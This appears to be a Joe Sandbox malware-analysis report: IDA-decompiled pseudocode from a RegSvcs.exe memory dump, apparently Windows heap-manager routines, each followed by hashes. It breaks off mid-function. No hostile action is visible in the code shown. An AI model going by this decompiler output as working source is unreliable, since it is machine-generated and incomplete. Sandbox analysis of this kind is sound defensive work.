                                          			E013C2B28(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, intOrPtr* _a12) {
                                          				char _v5;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t30;
                                          				signed int _t35;
                                          				unsigned int _t50;
                                          				signed int _t52;
                                          				signed int _t53;
                                          				unsigned int _t58;
                                          				signed int _t61;
                                          				signed int _t63;
                                          				signed int _t67;
                                          				signed int _t69;
                                          				intOrPtr _t75;
                                          				signed int _t81;
                                          				signed int _t87;
                                          				void* _t88;
                                          				signed int _t90;
                                          				signed int _t93;
                                          
                                          				_t69 = __ecx;
                                          				_t30 = _a4;
                                          				_t90 = __edx;
                                          				_t81 = __ecx;
                                          				_v12 = __ecx;
                                          				_t87 = _t30 - 8;
                                          				if(( *(__ecx + 0x38) & 0x00000001) != 0 && (_t30 & 0x00000fff) == 0) {
                                          					_t87 = _t87 - 8;
                                          				}
                                          				_t67 = 0;
                                          				if(_t90 != 0) {
                                          					L14:
                                          					if((0x0000abed ^  *(_t90 + 0x16)) ==  *((intOrPtr*)(_t90 + 0x14))) {
                                          						_t75 = (( *_t87 ^  *0x13e6110 ^ _t87) >> 0x00000001 & 0x00007fff) * 8 - 8;
                                          						 *_a12 = _t75;
                                          						_t35 = _a8 & 0x00000001;
                                          						_v16 = _t35;
                                          						if(_t35 == 0) {
                                          							E01312280(_t35, _t81);
                                          							_t81 = _v12;
                                          						}
                                          						_v5 = 0xff;
                                          						if(( *_t87 ^  *0x13e6110 ^ _t87) < 0) {
                                          							_t91 = _v12;
                                          							_t88 = E013C241A(_v12, _t90, _t87, _a8,  &_v5);
                                          							if(_v16 == _t67) {
                                          								E0130FFB0(_t67, _t88, _t91);
                                          							}
                                          							if(_t88 != 0) {
                                          								E013C3209(_t91, _t88, _a8);
                                          							}
                                          							_t67 = 1;
                                          						} else {
                                          							_push(_t75);
                                          							_push(_t67);
                                          							E013BA80D( *((intOrPtr*)(_t81 + 0x20)), 8, _a4, _t87);
                                          							if(_v16 == _t67) {
                                          								E0130FFB0(_t67, _t87, _v12);
                                          							}
                                          						}
                                          					} else {
                                          						_push(_t69);
                                          						_push(_t67);
                                          						E013BA80D( *((intOrPtr*)(_t81 + 0x20)), 0x12, _t90, _t67);
                                          					}
                                          					return _t67;
                                          				}
                                          				_t69 =  *0x13e6110; // 0x7900493f
                                          				_t93 = _t87;
                                          				_t50 = _t69 ^ _t87 ^  *_t87;
                                          				if(_t50 >= 0) {
                                          					_t52 = _t50 >> 0x00000010 & 0x00007fff;
                                          					if(_t52 == 0) {
                                          						L12:
                                          						_t53 = _t67;
                                          						L13:
                                          						_t90 = _t93 - (_t53 << 0x0000000c) & 0xfffff000;
                                          						goto L14;
                                          					}
                                          					_t93 = _t87 - (_t52 << 3);
                                          					_t58 =  *_t93 ^ _t69 ^ _t93;
                                          					if(_t58 < 0) {
                                          						L10:
                                          						_t61 =  *(_t93 + 4) ^ _t69 ^ _t93;
                                          						L11:
                                          						_t53 = _t61 & 0x000000ff;
                                          						goto L13;
                                          					}
                                          					_t63 = _t58 >> 0x00000010 & 0x00007fff;
                                          					if(_t63 == 0) {
                                          						goto L12;
                                          					}
                                          					_t93 = _t93 + _t63 * 0xfffffff8;
                                          					goto L10;
                                          				}
                                          				_t61 =  *(_t87 + 4) ^ _t69 ^ _t87;
                                          				goto L11;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 12c8325f0ea9851a61df03d667cd6387f70134554575e189415ec4f945404be3
                                          • Instruction ID: 12a88c3430a7ddea54a73e9aae143c3a1dbef2cc12fb2f47ef027ec1840610db
                                          • Opcode Fuzzy Hash: 12c8325f0ea9851a61df03d667cd6387f70134554575e189415ec4f945404be3
                                          • Instruction Fuzzy Hash: 1D411A73A105099FD725DF6CC8809BBBBE9EF48B28F05866DE915DB280DA34DD06C790
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E013BAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
                                          				intOrPtr _v8;
                                          				char _v12;
                                          				signed int _v16;
                                          				signed char _v20;
                                          				intOrPtr _v24;
                                          				char* _t37;
                                          				void* _t47;
                                          				signed char _t51;
                                          				void* _t53;
                                          				char _t55;
                                          				intOrPtr _t57;
                                          				signed char _t61;
                                          				intOrPtr _t75;
                                          				void* _t76;
                                          				signed int _t81;
                                          				intOrPtr _t82;
                                          
                                          				_t53 = __ecx;
                                          				_t55 = 0;
                                          				_v20 = _v20 & 0;
                                          				_t75 = __edx;
                                          				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
                                          				_v24 = __edx;
                                          				_v12 = 0;
                                          				if((_t81 & 0x01000000) != 0) {
                                          					L5:
                                          					if(_a8 != 0) {
                                          						_t81 = _t81 | 0x00000008;
                                          					}
                                          					_t57 = E013BABF4(_t55 + _t75, _t81);
                                          					_v8 = _t57;
                                          					if(_t57 < _t75 || _t75 > 0x7fffffff) {
                                          						_t76 = 0;
                                          						_v16 = _v16 & 0;
                                          					} else {
                                          						_t59 = _t53;
                                          						_t76 = E013BAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
                                          						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
                                          							_t47 = E013BAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
                                          							_t61 = _v20;
                                          							if(_t61 != 0) {
                                          								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
                                          								if(E0139CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
                                          									L013177F0(_t53, 0, _t76);
                                          									_t76 = 0;
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_t82 = _v8;
                                          					L16:
                                          					if(E01317D50() == 0) {
                                          						_t37 = 0x7ffe0380;
                                          					} else {
                                          						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						E013B131B(_t53, _t76, _t82, _v16);
                                          					}
                                          					return _t76;
                                          				}
                                          				_t51 =  *(__ecx + 0x20);
                                          				_v20 = _t51;
                                          				if(_t51 == 0) {
                                          					goto L5;
                                          				}
                                          				_t81 = _t81 | 0x00000008;
                                          				if(E0139CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
                                          					_t55 = _v12;
                                          					goto L5;
                                          				} else {
                                          					_t82 = 0;
                                          					_t76 = 0;
                                          					_v16 = _v16 & 0;
                                          					goto L16;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction ID: 5784690b55ab202ceb129c5c99f89b4e251f5beaa5e3fba87c8b83088ad275cf
                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction Fuzzy Hash: DD31F532F00A056BEB15CB69C885BEFFBBADF80218F054469EA25A7A51EA748D00C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E01308A0A(intOrPtr* __ecx, signed int __edx) {
                                          				signed int _v8;
                                          				char _v524;
                                          				signed int _v528;
                                          				void* _v532;
                                          				char _v536;
                                          				char _v540;
                                          				char _v544;
                                          				intOrPtr* _v548;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t44;
                                          				void* _t46;
                                          				void* _t48;
                                          				signed int _t53;
                                          				signed int _t55;
                                          				intOrPtr* _t62;
                                          				void* _t63;
                                          				unsigned int _t75;
                                          				signed int _t79;
                                          				unsigned int _t81;
                                          				unsigned int _t83;
                                          				signed int _t84;
                                          				void* _t87;
                                          
                                          				_t76 = __edx;
                                          				_v8 =  *0x13ed360 ^ _t84;
                                          				_v536 = 0x200;
                                          				_t79 = 0;
                                          				_v548 = __edx;
                                          				_v544 = 0;
                                          				_t62 = __ecx;
                                          				_v540 = 0;
                                          				_v532 =  &_v524;
                                          				if(__edx == 0 || __ecx == 0) {
                                          					L6:
                                          					return E0133B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
                                          				} else {
                                          					_v528 = 0;
                                          					E0130E9C0(1, __ecx, 0, 0,  &_v528);
                                          					_t44 = _v528;
                                          					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
                                          					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
                                          					_t46 = 0xa;
                                          					_t87 = _t81 - _t46;
                                          					if(_t87 > 0 || _t87 == 0) {
                                          						 *_v548 = 0x12d1180;
                                          						L5:
                                          						_t79 = 1;
                                          						goto L6;
                                          					} else {
                                          						_t48 = E01321DB5(_t62,  &_v532,  &_v536);
                                          						_t76 = _v528;
                                          						if(_t48 == 0) {
                                          							L9:
                                          							E01333C2A(_t81, _t76,  &_v544);
                                          							 *_v548 = _v544;
                                          							goto L5;
                                          						}
                                          						_t62 = _v532;
                                          						if(_t62 != 0) {
                                          							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
                                          							_t53 =  *_t62;
                                          							_v528 = _t53;
                                          							if(_t53 != 0) {
                                          								_t63 = _t62 + 4;
                                          								_t55 = _v528;
                                          								do {
                                          									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
                                          										if(E01308999(_t63,  &_v540) == 0) {
                                          											_t55 = _v528;
                                          										} else {
                                          											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
                                          											_t55 = _v528;
                                          											if(_t75 >= _t83) {
                                          												_t83 = _t75;
                                          											}
                                          										}
                                          									}
                                          									_t63 = _t63 + 0x14;
                                          									_t55 = _t55 - 1;
                                          									_v528 = _t55;
                                          								} while (_t55 != 0);
                                          								_t62 = _v532;
                                          							}
                                          							if(_t62 !=  &_v524) {
                                          								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
                                          							}
                                          							_t76 = _t83 & 0x0000ffff;
                                          							_t81 = _t83 >> 0x10;
                                          						}
                                          						goto L9;
                                          					}
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c6403512ad6ef315ba6fb644750c0362a99b44fbef86a48a02834cf6b0c4219
                                          • Instruction ID: f2aff63e4703537a9114818ee86cb63da4e543044c3dc66f910802acc3130415
                                          • Opcode Fuzzy Hash: 9c6403512ad6ef315ba6fb644750c0362a99b44fbef86a48a02834cf6b0c4219
                                          • Instruction Fuzzy Hash: FF4162B0E0032D9BDB25DF59C898AAAB7F8FB54308F1045E9D91997692E770DE80CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E013C22AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				signed char _v16;
                                          				signed int _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v36;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t50;
                                          				signed int _t53;
                                          				signed char _t63;
                                          				signed char _t71;
                                          				signed char _t75;
                                          				signed int _t77;
                                          				unsigned int _t106;
                                          				unsigned int* _t114;
                                          				signed int _t117;
                                          
                                          				_v20 = _v20 & 0x00000000;
                                          				_t117 = _a4;
                                          				_t114 = __ecx;
                                          				_v24 = __edx;
                                          				E013C21E8(_t117, __edx,  &_v16,  &_v12);
                                          				if(_v24 != 0 && (_v12 | _v8) != 0) {
                                          					_t71 =  !_v8;
                                          					_v16 =  !_v12 >> 8 >> 8;
                                          					_t72 = _t71 >> 8;
                                          					_t50 = _v16;
                                          					_t20 = (_t50 >> 8) + 0x12dac00; // 0x6070708
                                          					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x12dac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x12dac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x12dac00)) & 0x000000ff);
                                          					_v16 = _t75;
                                          					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
                                          						L6:
                                          						_t53 =  *0x13e6110; // 0x7900493f
                                          						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
                                          						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x13e6110 ^ _t117) & 0x000000ff | 0x00000200;
                                          						_t77 = _a8 & 0x00000001;
                                          						if(_t77 == 0) {
                                          							E0130FFB0(_t77, _t114, _t114);
                                          						}
                                          						_t63 = E013C2FBD(_t114, _v24, _v12, _v8, _v16, 0);
                                          						_v36 = 1;
                                          						if(_t77 == 0) {
                                          							E01312280(_t63, _t114);
                                          						}
                                          						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
                                          						 *_a12 = 0xff;
                                          					} else {
                                          						_t106 =  *(__ecx + 0x18) >> 7;
                                          						if(_t106 <= 8) {
                                          							_t106 = 8;
                                          						}
                                          						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
                                          							goto L6;
                                          						}
                                          					}
                                          				}
                                          				return _v20;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00c35666098df93bc317a1c54d5babd613e3296362f319f39af89f264465e488
                                          • Instruction ID: 3eec33f9ecb8a38aad248df05565be933027be7f4239366f1c237abb5241267a
                                          • Opcode Fuzzy Hash: 00c35666098df93bc317a1c54d5babd613e3296362f319f39af89f264465e488
                                          • Instruction Fuzzy Hash: 484114712043424BC305CF28C8A597BBBE0EF95725F14465DF4D58B2D2CE34D909C7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 76%
                                          			E013BFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _t29;
                                          				char* _t32;
                                          				char* _t43;
                                          				signed int _t80;
                                          				signed int* _t84;
                                          
                                          				_push(__ecx);
                                          				_push(__ecx);
                                          				_t56 = __edx;
                                          				_t84 = __ecx;
                                          				_t80 = E013BFD4E(__ecx, __edx);
                                          				_v12 = _t80;
                                          				if(_t80 != 0) {
                                          					_t29 =  *__ecx & _t80;
                                          					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
                                          					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
                                          						E013C0A13(__ecx, _t80, 0, _a4);
                                          						_t80 = 1;
                                          						if(E01317D50() == 0) {
                                          							_t32 = 0x7ffe0380;
                                          						} else {
                                          							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          						}
                                          						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          							_push(3);
                                          							L21:
                                          							E013B1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
                                          						}
                                          						goto L22;
                                          					}
                                          					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
                                          						_t80 = E013C2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
                                          						if(_t80 != 0) {
                                          							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
                                          							_t77 = _v8;
                                          							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
                                          								E013BC8F7(_t66, _t77, 0);
                                          							}
                                          						}
                                          					} else {
                                          						_t80 = E013BDBD2(__ecx[0xb], _t74, __edx, _a4);
                                          					}
                                          					if(E01317D50() == 0) {
                                          						_t43 = 0x7ffe0380;
                                          					} else {
                                          						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
                                          						goto L22;
                                          					} else {
                                          						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
                                          						goto L21;
                                          					}
                                          				} else {
                                          					_push(__ecx);
                                          					_push(_t80);
                                          					E013BA80D(__ecx[0xf], 9, __edx, _t80);
                                          					L22:
                                          					return _t80;
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction ID: e12b327019f8b0923936476e9777ddb093a933492814fdcec66e270bdfb112e4
                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction Fuzzy Hash: 1D310532200645AFD3229B7CCCC4FBABBADEBC5A58F185059E6498BF42EA74DC41C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E013C20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _t35;
                                          				signed int _t57;
                                          				unsigned int _t61;
                                          				signed int _t63;
                                          				signed int _t64;
                                          				signed int _t73;
                                          				signed int _t77;
                                          				signed int _t80;
                                          				signed int _t83;
                                          				signed int _t84;
                                          				unsigned int _t92;
                                          				unsigned int _t97;
                                          				signed int _t100;
                                          				unsigned int _t102;
                                          
                                          				_t79 = __edx;
                                          				_t35 =  *0x13e6110; // 0x7900493f
                                          				_t57 = _a4;
                                          				_v8 = __ecx;
                                          				_t84 =  *_t57;
                                          				_v12 = __edx;
                                          				_t61 = _t84 ^ _t35 ^ _t57;
                                          				_t83 = _t61 >> 0x00000001 & 0x00007fff;
                                          				_v20 = _t83;
                                          				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
                                          				_t63 = _t61 >> 0x00000010 & 0x00007fff;
                                          				if(_t63 != 0) {
                                          					_t100 =  *0x13e6110; // 0x7900493f
                                          					_t77 = _t57 - (_t63 << 3);
                                          					_v16 = _t77;
                                          					_t102 = _t100 ^ _t77 ^  *_t77;
                                          					_t106 = _t102;
                                          					if(_t102 >= 0) {
                                          						E013C2E3F(_v8, __edx, _t106, _t77);
                                          						_t57 = _v16;
                                          						_t79 = _v12;
                                          						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
                                          					}
                                          				}
                                          				_t64 = _t57 + _t83 * 8;
                                          				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
                                          					asm("lfence");
                                          					_t97 =  *_t64 ^  *0x13e6110 ^ _t64;
                                          					_t109 = _t97;
                                          					if(_t97 >= 0) {
                                          						E013C2E3F(_v8, _t79, _t109, _t64);
                                          						_t79 = _v12;
                                          						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
                                          					}
                                          				}
                                          				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
                                          					_t73 = _t57 + _t83 * 8;
                                          					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
                                          						asm("lfence");
                                          						_t92 =  *_t73 ^  *0x13e6110 ^ _t73;
                                          						_t113 = _t92;
                                          						if(_t92 >= 0) {
                                          							E013C2E3F(_v8, _t79, _t113, _t73);
                                          							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
                                          						}
                                          					}
                                          				}
                                          				if(_v20 != _t83) {
                                          					_t66 = _v12;
                                          					_t80 = _t57 + _t83 * 8;
                                          					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x13e6110 ^ _t57) & 0x0000fffe;
                                          					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
                                          						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x13e6110 ^ _t80) & 0x7fff0000;
                                          					}
                                          				}
                                          				 *_a8 = _t83;
                                          				return _t57;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f7930e6b01649934a42d5d98347138a30f2c12e57dca2b3fec8051d05b5cf23
                                          • Instruction ID: a12848ce1e1f34ee9f797823c1bc8a613b17e1a510511b5c98a3790d32d2d215
                                          • Opcode Fuzzy Hash: 0f7930e6b01649934a42d5d98347138a30f2c12e57dca2b3fec8051d05b5cf23
                                          • Instruction Fuzzy Hash: A141F673E1012A8BCB28DF68C49157AF7F5FF88708B5602BDD905AB285DB34AD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E013C2D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
                                          				char _v5;
                                          				signed char _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int* _v24;
                                          				signed int _t34;
                                          				signed char _t40;
                                          				signed int* _t49;
                                          				signed int _t55;
                                          				signed char _t57;
                                          				signed char _t58;
                                          				signed char _t59;
                                          				signed short _t60;
                                          				unsigned int _t66;
                                          				unsigned int _t71;
                                          				signed int _t77;
                                          				signed char _t83;
                                          				signed char _t84;
                                          				signed int _t91;
                                          				signed int _t93;
                                          				signed int _t96;
                                          
                                          				_t34 = E013C21E8(_a4, __edx,  &_v24,  &_v20);
                                          				_t83 =  !_v20;
                                          				_t57 =  !_v16;
                                          				_t84 = _t83 >> 8;
                                          				_v12 = _t84 >> 8;
                                          				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x12dac00));
                                          				_t58 = _t57 >> 8;
                                          				_t59 = _t58 >> 8;
                                          				_t66 = _t59 >> 8;
                                          				_t60 = _a4;
                                          				_t13 = _t66 + 0x12dac00; // 0x6070708
                                          				_t40 = _v12;
                                          				_t71 = _t40 >> 8;
                                          				_v12 = 0;
                                          				_t17 = _t71 + 0x12dac00; // 0x6070708
                                          				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x12dac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x12dac00)) + _v5 & 0x000000ff);
                                          				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x13e6110 ^ _t34 ^ _t60) & 0x00000001;
                                          				_t49 = __ecx + 8;
                                          				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x13e6110 & 0x0000ffff;
                                          				_t91 =  *_t49;
                                          				_t96 = _t49[1] & 1;
                                          				_v24 = _t49;
                                          				if(_t91 != 0) {
                                          					_t93 = _t77;
                                          					L2:
                                          					while(1) {
                                          						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x13e6110 & 0x0000ffff)) {
                                          							_t55 =  *_t91;
                                          							if(_t96 == 0) {
                                          								L11:
                                          								if(_t55 == 0) {
                                          									goto L13;
                                          								} else {
                                          									goto L12;
                                          								}
                                          							} else {
                                          								if(_t55 == 0) {
                                          									L13:
                                          									_v12 = 0;
                                          								} else {
                                          									_t55 = _t55 ^ _t91;
                                          									goto L11;
                                          								}
                                          							}
                                          						} else {
                                          							_t55 =  *(_t91 + 4);
                                          							if(_t96 == 0) {
                                          								L6:
                                          								if(_t55 != 0) {
                                          									L12:
                                          									_t91 = _t55;
                                          									continue;
                                          								} else {
                                          									goto L7;
                                          								}
                                          							} else {
                                          								if(_t55 == 0) {
                                          									L7:
                                          									_v12 = 1;
                                          								} else {
                                          									_t55 = _t55 ^ _t91;
                                          									goto L6;
                                          								}
                                          							}
                                          						}
                                          						goto L14;
                                          					}
                                          				}
                                          				L14:
                                          				_t29 = _t60 + 4; // 0x4
                                          				return E0130B090(_v24, _t91, _v12, _t29);
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4402c8aedbc9fdcb8e62de005d2932958d93a9e615e10343e78caca2d7a1bc5d
                                          • Instruction ID: 730d0cd14b746fbb6e87f74a892cb233bfe222560824c9bb5058d0fa48f613d1
                                          • Opcode Fuzzy Hash: 4402c8aedbc9fdcb8e62de005d2932958d93a9e615e10343e78caca2d7a1bc5d
                                          • Instruction Fuzzy Hash: 274148715002654FC711CF7AC8A1ABBBFF5EF85215B1981AAD885EB282DA34D906C770
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E013BEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                                          				signed int _v8;
                                          				char _v12;
                                          				intOrPtr _v15;
                                          				char _v16;
                                          				intOrPtr _v19;
                                          				void* _v28;
                                          				intOrPtr _v36;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t26;
                                          				signed int _t27;
                                          				char* _t40;
                                          				unsigned int* _t50;
                                          				intOrPtr* _t58;
                                          				unsigned int _t59;
                                          				char _t75;
                                          				signed int _t86;
                                          				intOrPtr _t88;
                                          				intOrPtr* _t91;
                                          
                                          				_t75 = __edx;
                                          				_t91 = __ecx;
                                          				_v12 = __edx;
                                          				_t50 = __ecx + 0x30;
                                          				_t86 = _a4 & 0x00000001;
                                          				if(_t86 == 0) {
                                          					E01312280(_t26, _t50);
                                          					_t75 = _v16;
                                          				}
                                          				_t58 = _t91;
                                          				_t27 = E013BE815(_t58, _t75);
                                          				_v8 = _t27;
                                          				if(_t27 != 0) {
                                          					E012FF900(_t91 + 0x34, _t27);
                                          					if(_t86 == 0) {
                                          						E0130FFB0(_t50, _t86, _t50);
                                          					}
                                          					_push( *((intOrPtr*)(_t91 + 4)));
                                          					_push( *_t91);
                                          					_t59 =  *(_v8 + 0x10);
